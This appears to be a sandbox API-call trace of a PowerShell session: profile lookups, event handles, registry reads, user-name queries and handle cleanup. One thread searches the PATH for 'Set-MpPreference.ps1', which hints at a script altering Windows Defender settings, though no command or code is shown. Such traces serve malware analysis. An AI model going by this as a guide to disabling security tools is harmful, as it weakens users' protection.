	[0057.357] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x22e61c | out: lpFileInformation=0x22e61c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0057.357] GetLastError () returned 0x2
	[0057.357] SetErrorMode (uMode=0x1) returned 0x1
	[0057.357] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x22e19c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x3d
	[0057.357] GetLastError () returned 0x2
	[0057.357] SetErrorMode (uMode=0x1) returned 0x1
	[0057.357] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\2xc7u663gxwc\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x22e61c | out: lpFileInformation=0x22e61c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0057.357] GetLastError () returned 0x3
	[0057.357] SetErrorMode (uMode=0x1) returned 0x1
	[0057.357] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x22e19c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x52
	[0057.357] GetLastError () returned 0x3
	[0057.357] SetErrorMode (uMode=0x1) returned 0x1
	[0057.357] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\2xc7u663gxwc\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x22e61c | out: lpFileInformation=0x22e61c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0057.358] GetLastError () returned 0x3
	[0057.358] SetErrorMode (uMode=0x1) returned 0x1
	[0057.358] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.358] GetLastError () returned 0xcb
	[0057.360] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.360] GetLastError () returned 0xcb
	[0057.362] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.362] GetLastError () returned 0xcb
	[0057.363] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.363] GetLastError () returned 0xcb
	[0057.364] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.364] GetLastError () returned 0xcb
	[0057.371] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.371] GetLastError () returned 0xcb
	[0057.371] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x32c
	[0057.371] GetLastError () returned 0x0
	[0057.371] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x304
	[0057.371] GetLastError () returned 0x0
	[0057.371] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x320
	[0057.371] GetLastError () returned 0x0
	[0057.371] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x330
	[0057.371] GetLastError () returned 0x0
	[0057.371] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x334
	[0057.371] GetLastError () returned 0x0
	[0057.371] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x338
	[0057.371] GetLastError () returned 0x0
	[0057.371] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0057.372] GetLastError () returned 0x0
	[0057.372] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x340
	[0057.372] GetLastError () returned 0x0
	[0057.372] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x394
	[0057.372] GetLastError () returned 0x0
	[0057.372] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x398
	[0057.372] GetLastError () returned 0x0
	[0057.372] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x350
	[0057.372] GetLastError () returned 0x0
	[0057.372] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x354
	[0057.372] GetLastError () returned 0x0
	[0057.373] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.373] GetLastError () returned 0xcb
	[0057.376] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0057.376] GetLastError () returned 0xcb
	[0057.377] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x22e65c | out: lpMode=0x22e65c) returned 1
	[0057.377] GetLastError () returned 0xcb
	[0057.380] SetEvent (hEvent=0x330) returned 1
	[0057.380] GetLastError () returned 0xcb
	[0057.380] SetEvent (hEvent=0x32c) returned 1
	[0057.380] GetLastError () returned 0xcb
	[0057.380] SetEvent (hEvent=0x304) returned 1
	[0057.380] GetLastError () returned 0xcb
	[0057.380] SetEvent (hEvent=0x320) returned 1
	[0057.380] GetLastError () returned 0xcb
	[0057.380] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x358
	[0057.380] GetLastError () returned 0x0
	[0057.380] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.380] GetLastError () returned 0xcb
	[0057.381] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e4c0 | out: phkResult=0x22e4c0*=0x35c) returned 0x0
	[0057.381] RegQueryValueExW (in: hKey=0x35c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x22e508, lpData=0x0, lpcbData=0x22e504*=0x0 | out: lpType=0x22e508*=0x0, lpData=0x0, lpcbData=0x22e504*=0x0) returned 0x2
	[0060.578] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x380
	[0060.578] GetLastError () returned 0x0
	[0060.578] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x384
	[0060.578] GetLastError () returned 0x0
	[0060.578] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a0
	[0060.578] GetLastError () returned 0x0
	[0060.578] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388
	[0060.578] GetLastError () returned 0x0
	[0060.578] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a8
	[0060.578] GetLastError () returned 0x0
	[0060.579] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3ac
	[0060.579] GetLastError () returned 0x0
	[0060.579] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b0
	[0060.579] GetLastError () returned 0x0
	[0060.579] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b4
	[0060.579] GetLastError () returned 0x0
	[0060.579] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3b8
	[0060.579] GetLastError () returned 0x0
	[0060.579] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3bc
	[0060.579] GetLastError () returned 0x0
	[0060.579] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c0
	[0060.579] GetLastError () returned 0x0
	[0060.579] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c4
	[0060.579] GetLastError () returned 0x0
	[0060.579] SetEvent (hEvent=0x388) returned 1
	[0060.579] GetLastError () returned 0x0
	[0060.579] SetEvent (hEvent=0x380) returned 1
	[0060.579] GetLastError () returned 0x0
	[0060.580] SetEvent (hEvent=0x384) returned 1
	[0060.580] GetLastError () returned 0x0
	[0060.580] SetEvent (hEvent=0x3a0) returned 1
	[0060.580] GetLastError () returned 0x0
	[0060.580] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c8
	[0060.580] GetLastError () returned 0x0
	[0060.580] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e4f4 | out: phkResult=0x22e4f4*=0x3cc) returned 0x0
	[0060.580] RegQueryValueExW (in: hKey=0x3cc, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x22e53c, lpData=0x0, lpcbData=0x22e538*=0x0 | out: lpType=0x22e53c*=0x0, lpData=0x0, lpcbData=0x22e538*=0x0) returned 0x2
	[0060.751] SetEvent (hEvent=0x3a8) returned 1
	[0060.751] GetLastError () returned 0x0
	[0060.751] SetEvent (hEvent=0x3ac) returned 1
	[0060.751] GetLastError () returned 0x0
	[0060.751] SetEvent (hEvent=0x3b0) returned 1
	[0060.751] GetLastError () returned 0x0
	[0060.761] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0060.761] GetLastError () returned 0xcb
	[0060.764] SetEvent (hEvent=0x318) returned 1
	[0060.765] GetLastError () returned 0xcb
	[0060.766] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3c3ce0, nSize=0x22e5d0 | out: lpNameBuffer="ZGW5TDPU\\2XC7u663GxWc", nSize=0x22e5d0) returned 0x1
	[0060.766] GetLastError () returned 0xcb
	[0060.766] GetUserNameW (in: lpBuffer=0x3c3520, pcbBuffer=0x22e5d8 | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0x22e5d8) returned 1
	[0060.768] ReportEventW (hEventLog=0x4890004, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x21d5e58*="Stopped", lpRawData=0x21d5d14) returned 1
	[0060.841] GetLastError () returned 0x0
	[0060.841] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1
	[0060.841] GetLastError () returned 0x0
	[0060.843] CoGetContextToken (in: pToken=0x22f300 | out: pToken=0x22f300) returned 0x0
	[0060.843] CObjectContext::QueryInterface () returned 0x0
	[0060.843] CObjectContext::GetCurrentThreadType () returned 0x0
	[0060.843] Release () returned 0x0
	[0060.844] CoGetContextToken (in: pToken=0x22f0d8 | out: pToken=0x22f0d8) returned 0x0
	[0060.844] CObjectContext::QueryInterface () returned 0x0
	[0060.844] CObjectContext::GetCurrentThreadType () returned 0x0
	[0060.844] Release () returned 0x0
	[0060.847] CoGetContextToken (in: pToken=0x22f0d8 | out: pToken=0x22f0d8) returned 0x0
	[0060.847] CObjectContext::QueryInterface () returned 0x0
	[0060.847] CObjectContext::GetCurrentThreadType () returned 0x0
	[0060.847] Release () returned 0x0
	[0060.851] CoGetContextToken (in: pToken=0x22f0d8 | out: pToken=0x22f0d8) returned 0x0
	[0060.851] CObjectContext::QueryInterface () returned 0x0
	[0060.851] CObjectContext::GetCurrentThreadType () returned 0x0
	[0060.851] Release () returned 0x0
	[0060.880] CoGetContextToken (in: pToken=0x22f0b8 | out: pToken=0x22f0b8) returned 0x0
	[0060.880] CObjectContext::QueryInterface () returned 0x0
	[0060.880] CObjectContext::GetCurrentThreadType () returned 0x0
	[0060.880] Release () returned 0x0
	[0060.881] CoUninitialize () 

Thread:
	id = 32
	os_tid = 0xf20


Thread:
	id = 33
	os_tid = 0xf24


Thread:
	id = 34
	os_tid = 0xf28


Thread:
	id = 35
	os_tid = 0xf2c


Thread:
	id = 36
	os_tid = 0xf30

	[0048.534] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0053.837] LocalFree (hMem=0x3a8690) returned 0x0
	[0053.837] GetLastError () returned 0x0
	[0053.837] CloseHandle (hObject=0x320) returned 1
	[0053.837] GetLastError () returned 0x0
	[0053.837] CloseHandle (hObject=0x13) returned 1
	[0053.837] GetLastError () returned 0x0
	[0053.837] CloseHandle (hObject=0xf) returned 1
	[0053.837] GetLastError () returned 0x0
	[0053.838] RegCloseKey (hKey=0x304) returned 0x0
	[0053.838] RegCloseKey (hKey=0x300) returned 0x0
	[0053.838] RegCloseKey (hKey=0x2fc) returned 0x0
	[0053.838] LocalFree (hMem=0x3a86b0) returned 0x0
	[0053.838] GetLastError () returned 0x0
	[0053.838] RegCloseKey (hKey=0x32c) returned 0x0
	[0054.932] RegCloseKey (hKey=0x32c) returned 0x0
	[0056.401] RegCloseKey (hKey=0x3a0) returned 0x0
	[0056.402] RegCloseKey (hKey=0x384) returned 0x0
	[0056.402] RegCloseKey (hKey=0x380) returned 0x0
	[0056.402] RegCloseKey (hKey=0x37c) returned 0x0
	[0056.402] RegCloseKey (hKey=0x378) returned 0x0
	[0056.403] RegCloseKey (hKey=0x374) returned 0x0
	[0056.403] RegCloseKey (hKey=0x370) returned 0x0
	[0056.403] RegCloseKey (hKey=0x34c) returned 0x0
	[0056.403] RegCloseKey (hKey=0x39c) returned 0x0
	[0056.404] RegCloseKey (hKey=0x368) returned 0x0
	[0056.404] RegCloseKey (hKey=0x364) returned 0x0
	[0056.404] RegCloseKey (hKey=0x360) returned 0x0
	[0056.404] RegCloseKey (hKey=0x35c) returned 0x0
	[0056.405] RegCloseKey (hKey=0x358) returned 0x0
	[0056.405] RegCloseKey (hKey=0x354) returned 0x0
	[0056.405] RegCloseKey (hKey=0x350) returned 0x0
	[0056.405] RegCloseKey (hKey=0x398) returned 0x0
	[0056.405] RegCloseKey (hKey=0x394) returned 0x0
	[0056.406] RegCloseKey (hKey=0x340) returned 0x0
	[0056.406] RegCloseKey (hKey=0x33c) returned 0x0
	[0056.406] RegCloseKey (hKey=0x338) returned 0x0
	[0056.406] RegCloseKey (hKey=0x334) returned 0x0
	[0056.407] RegCloseKey (hKey=0x330) returned 0x0
	[0056.407] RegCloseKey (hKey=0x320) returned 0x0
	[0056.407] RegCloseKey (hKey=0x304) returned 0x0
	[0056.407] RegCloseKey (hKey=0x32c) returned 0x0
	[0056.407] RegCloseKey (hKey=0x2fc) returned 0x0
	[0056.408] RegCloseKey (hKey=0x390) returned 0x0
	[0056.408] RegCloseKey (hKey=0x38c) returned 0x0
	[0056.408] RegCloseKey (hKey=0x36c) returned 0x0
	[0057.948] RegCloseKey (hKey=0x35c) returned 0x0
	[0060.846] GetLastError () returned 0x0
	[0060.846] GetLastError () returned 0x0
	[0060.846] LocalFree (hMem=0x3960a0) returned 0x0
	[0060.846] GetLastError () returned 0x0
	[0060.846] GetLastError () returned 0x0
	[0060.846] GetLastError () returned 0x0
	[0060.846] LocalFree (hMem=0x396018) returned 0x0
	[0060.847] GetLastError () returned 0x0
	[0060.851] DeregisterEventSource (hEventLog=0x4890004) returned 1
	[0060.851] GetLastError () returned 0x0
	[0060.863] CloseHandle (hObject=0x3c0) returned 1
	[0060.863] GetLastError () returned 0x0
	[0060.863] CloseHandle (hObject=0x3bc) returned 1
	[0060.863] GetLastError () returned 0x0
	[0060.863] CloseHandle (hObject=0x3b8) returned 1
	[0060.863] GetLastError () returned 0x0
	[0060.863] CloseHandle (hObject=0x3b4) returned 1
	[0060.863] GetLastError () returned 0x0
	[0060.863] CloseHandle (hObject=0x3b0) returned 1
	[0060.863] GetLastError () returned 0x0
	[0060.864] CloseHandle (hObject=0x3ac) returned 1
	[0060.864] GetLastError () returned 0x0
	[0060.864] CloseHandle (hObject=0x3a8) returned 1
	[0060.864] GetLastError () returned 0x0
	[0060.864] CloseHandle (hObject=0x388) returned 1
	[0060.864] GetLastError () returned 0x0
	[0060.864] CloseHandle (hObject=0x3a0) returned 1
	[0060.864] GetLastError () returned 0x0
	[0060.864] CloseHandle (hObject=0x384) returned 1
	[0060.864] GetLastError () returned 0x0
	[0060.864] CloseHandle (hObject=0x380) returned 1
	[0060.865] GetLastError () returned 0x0
	[0060.865] CloseHandle (hObject=0xf) returned 1
	[0060.865] GetLastError () returned 0x0
	[0060.865] CloseHandle (hObject=0x7f) returned 1
	[0060.865] GetLastError () returned 0x0
	[0060.865] CloseHandle (hObject=0x7b) returned 1
	[0060.866] GetLastError () returned 0x0
	[0060.866] CloseHandle (hObject=0x77) returned 1
	[0060.866] GetLastError () returned 0x0
	[0060.866] CloseHandle (hObject=0x73) returned 1
	[0060.866] GetLastError () returned 0x0
	[0060.866] CloseHandle (hObject=0x6f) returned 1
	[0060.866] GetLastError () returned 0x0
	[0060.867] CloseHandle (hObject=0x6b) returned 1
	[0060.867] GetLastError () returned 0x0
	[0060.867] CloseHandle (hObject=0x67) returned 1
	[0060.867] GetLastError () returned 0x0
	[0060.867] CloseHandle (hObject=0x63) returned 1
	[0060.867] GetLastError () returned 0x0
	[0060.868] CloseHandle (hObject=0x5f) returned 1
	[0060.868] GetLastError () returned 0x0
	[0060.868] CloseHandle (hObject=0x5b) returned 1
	[0060.868] GetLastError () returned 0x0
	[0060.868] CloseHandle (hObject=0x57) returned 1
	[0060.868] GetLastError () returned 0x0
	[0060.869] CloseHandle (hObject=0x53) returned 1
	[0060.869] GetLastError () returned 0x0
	[0060.869] CloseHandle (hObject=0x4f) returned 1
	[0060.869] GetLastError () returned 0x0
	[0060.870] CloseHandle (hObject=0x4b) returned 1
	[0060.870] GetLastError () returned 0x0
	[0060.870] CloseHandle (hObject=0x47) returned 1
	[0060.870] GetLastError () returned 0x0
	[0060.870] CloseHandle (hObject=0x358) returned 1
	[0060.870] GetLastError () returned 0x0
	[0060.870] CloseHandle (hObject=0x354) returned 1
	[0060.870] GetLastError () returned 0x0
	[0060.871] CloseHandle (hObject=0x350) returned 1
	[0060.871] GetLastError () returned 0x0
	[0060.871] CloseHandle (hObject=0x398) returned 1
	[0060.871] GetLastError () returned 0x0
	[0060.871] CloseHandle (hObject=0x394) returned 1
	[0060.871] GetLastError () returned 0x0
	[0060.871] CloseHandle (hObject=0x340) returned 1
	[0060.871] GetLastError () returned 0x0
	[0060.871] CloseHandle (hObject=0x33c) returned 1
	[0060.871] GetLastError () returned 0x0
	[0060.871] CloseHandle (hObject=0x338) returned 1
	[0060.871] GetLastError () returned 0x0
	[0060.872] CloseHandle (hObject=0x334) returned 1
	[0060.872] GetLastError () returned 0x0
	[0060.872] CloseHandle (hObject=0x330) returned 1
	[0060.872] GetLastError () returned 0x0
	[0060.872] CloseHandle (hObject=0x320) returned 1
	[0060.872] GetLastError () returned 0x0
	[0060.872] CloseHandle (hObject=0x304) returned 1
	[0060.872] GetLastError () returned 0x0
	[0060.873] CloseHandle (hObject=0x32c) returned 1
	[0060.873] GetLastError () returned 0x0
	[0060.873] CloseHandle (hObject=0x43) returned 1
	[0060.873] GetLastError () returned 0x0
	[0060.873] CloseHandle (hObject=0x3f) returned 1
	[0060.873] GetLastError () returned 0x0
	[0060.873] CloseHandle (hObject=0x3b) returned 1
	[0060.874] GetLastError () returned 0x0
	[0060.874] CloseHandle (hObject=0x37) returned 1
	[0060.874] GetLastError () returned 0x0
	[0060.874] CloseHandle (hObject=0x33) returned 1
	[0060.874] GetLastError () returned 0x0
	[0060.874] CloseHandle (hObject=0x2f) returned 1
	[0060.874] GetLastError () returned 0x0
	[0060.875] CloseHandle (hObject=0x2b) returned 1
	[0060.875] GetLastError () returned 0x0
	[0060.875] CloseHandle (hObject=0x27) returned 1
	[0060.875] GetLastError () returned 0x0
	[0060.875] CloseHandle (hObject=0x23) returned 1
	[0060.875] GetLastError () returned 0x0
	[0060.876] CloseHandle (hObject=0x1f) returned 1
	[0060.876] GetLastError () returned 0x0
	[0060.876] CloseHandle (hObject=0x1b) returned 1
	[0060.876] GetLastError () returned 0x0
	[0060.876] CloseHandle (hObject=0x17) returned 1
	[0060.876] GetLastError () returned 0x0
	[0060.877] CloseHandle (hObject=0x13) returned 1
	[0060.877] GetLastError () returned 0x0
	[0060.877] CloseHandle (hObject=0x328) returned 1
	[0060.877] GetLastError () returned 0x0
	[0060.877] RegCloseKey (hKey=0x3cc) returned 0x0
	[0060.877] RegCloseKey (hKey=0x80000004) returned 0x0
	[0060.878] CloseHandle (hObject=0x3c8) returned 1
	[0060.878] GetLastError () returned 0x0
	[0060.878] CloseHandle (hObject=0x2e4) returned 1
	[0060.878] GetLastError () returned 0x0
	[0060.878] CloseHandle (hObject=0x318) returned 1
	[0060.878] GetLastError () returned 0x0
	[0060.878] UnmapViewOfFile (lpBaseAddress=0x4800000) returned 1
	[0060.879] CloseHandle (hObject=0x3c4) returned 1
	[0060.879] GetLastError () returned 0x0

Thread:
	id = 64
	os_tid = 0x8c8

	[0057.467] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0057.499] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0057.538] VirtualQuery (in: lpAddress=0x55fdef0, lpBuffer=0x55feef0, dwLength=0x1c | out: lpBuffer=0x55feef0*(BaseAddress=0x55fd000, AllocationBase=0x4c70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c
	[0057.541] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400e40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.541] GetLastError () returned 0xcb
	[0057.544] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400e40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.544] GetLastError () returned 0xcb
	[0057.546] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400e40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.546] GetLastError () returned 0xcb
	[0057.565] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400e40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.566] GetLastError () returned 0xcb
	[0057.568] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400e40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.568] GetLastError () returned 0xcb
	[0057.568] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400e40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.568] GetLastError () returned 0xcb
	[0057.576] VirtualQuery (in: lpAddress=0x55fe00c, lpBuffer=0x55ff00c, dwLength=0x1c | out: lpBuffer=0x55ff00c*(BaseAddress=0x55fe000, AllocationBase=0x4c70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0057.576] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400e40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.576] GetLastError () returned 0xcb
	[0057.578] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400e40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.578] GetLastError () returned 0xcb
	[0057.578] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400e40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.578] GetLastError () returned 0xcb
	[0057.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400e40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.632] GetLastError () returned 0xcb
	[0057.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400e40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.654] GetLastError () returned 0xcb
	[0057.744] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400e40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.744] GetLastError () returned 0xcb
	[0057.746] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400e40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.746] GetLastError () returned 0xcb
	[0057.746] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400e40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.746] GetLastError () returned 0xcb
	[0057.748] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400e40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.748] GetLastError () returned 0xcb
	[0057.749] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400e40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.749] GetLastError () returned 0xcb
	[0057.750] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400e40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.750] GetLastError () returned 0xcb
	[0057.751] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400e40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.751] GetLastError () returned 0xcb
	[0057.768] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400e40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0057.768] GetLastError () returned 0xcb
	[0057.779] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x400e40, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0057.779] GetLastError () returned 0xcb
	[0057.782] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x400e40, nSize=0x80 | out: lpBuffer="") returned 0x88
	[0057.782] GetLastError () returned 0xcb
	[0057.782] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x400e40, nSize=0x88 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0057.782] GetLastError () returned 0xcb
	[0057.852] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x401a50 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0057.852] GetLastError () returned 0xcb
	[0057.858] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0057.859] GetLastError () returned 0xcb
	[0057.859] SetErrorMode (uMode=0x1) returned 0x1
	[0057.866] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.ps1", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.867] GetLastError () returned 0x2
	[0057.867] SetErrorMode (uMode=0x1) returned 0x1
	[0057.868] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0057.868] GetLastError () returned 0x2
